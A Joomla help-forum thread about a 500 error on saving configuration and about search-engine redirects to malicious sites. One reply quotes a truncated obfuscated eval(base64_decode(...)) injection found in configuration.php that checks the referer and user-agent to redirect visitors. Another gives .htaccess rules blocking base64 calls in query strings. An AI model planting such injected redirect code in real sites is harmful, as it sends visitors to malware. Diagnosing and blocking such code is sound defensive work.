HTTP Error 500 (Internal Server Error) -Global Config Issue

This forum is for issues with installing Joomla! on IIS webservers.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Daniel Sah
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Fri Aug 24, 2012 9:49 pm

HTTP Error 500 (Internal Server Error) -Global Config Issue

Postby Daniel Sah » Sat Aug 25, 2012 11:30 pm

I am having trouble saving my Global Configuration after changing any values for my website.

I am especially wanted to change the Meta Settings under Global Configuration but after clicking the save button it show:
Server Error
HTTP Error 500 (Internal Server Error): An unexpected condition was encountered while the server was attempting to fulfil the request.

I wanted to change the Meta Settings because I am encountering problems with my website using search engine results. Whenever I click on the resulted search that supposedly link to my website but it will link me to another website instead. At first it linked me to a website which contained viruses then it linked me to this site below:
http://404.wikaba.com/

I have tried google, yahoo, bing search result but all directed me to another bad websites.

Please help, I am in desperate need to change my website Meta Settings.

fyi, if I type my website address on the address bar of any internet browsers, my website load with no problem.

mdoubleyou
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sun Aug 26, 2012 3:13 pm

Re: HTTP Error 500 (Internal Server Error) -Global Config Is

Postby mdoubleyou » Sun Aug 26, 2012 3:20 pm

I had the same problem.

My configuration.php had 64-base code like
eval(base64-decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikg"));

After I removed this code my sites work like before.

Use ftp, to download the file , update and upload.

Consider a clean joomla install and change you passwords.....

Regards,
Mdoubleyou

User avatar
ShibumiDesign
Joomla! Intern
Joomla! Intern
Posts: 52
Joined: Tue Jan 17, 2012 2:56 pm
Location: Ottawa, ON, Canada
Contact:

Re: HTTP Error 500 (Internal Server Error) -Global Config Is

Postby ShibumiDesign » Mon Mar 11, 2013 5:48 pm

mdoubleyou wrote:I had the same problem.

My configuration.php had 64-base code like

eval(base64_decode("DQplcnJ...wIikg"));

After I removed this code my sites work like before.

You can prevent this if you use .htaccess file... include this code in your .htaccess file at the root of your site:

Code: Select all

# Block out any script trying to base64_encode or base64_decode data within the URL
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [OR]
## IMPORTANT: If the above line throws an HTTP 500 error, replace it with these 2 lines:
# RewriteCond %{QUERY_STRING} base64_encode\(.*\) [OR]
# RewriteCond %{QUERY_STRING} base64_decode\(.*\) [OR]
http://ShibumiDesignStudios.com
Shibumi: Effortless Perfectiom

mainstwebguy
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 118
Joined: Fri Aug 29, 2008 11:40 am
Location: Michigan
Contact:

Re: HTTP Error 500 (Internal Server Error) -Global Config Is

Postby mainstwebguy » Fri Mar 28, 2014 6:26 pm

I had this issue come out of nowhere. Turned out to be in the configuration.php. For me, the dbhost was set to localhost, but when i changed it to the ip it worked.

try switching "localhost" to be "127.0.0.1:3306" and see if it helps. This solved my issues


Return to “Joomla! 1.5 on IIS webserver”

Who is online

Users browsing this forum: No registered users and 3 guests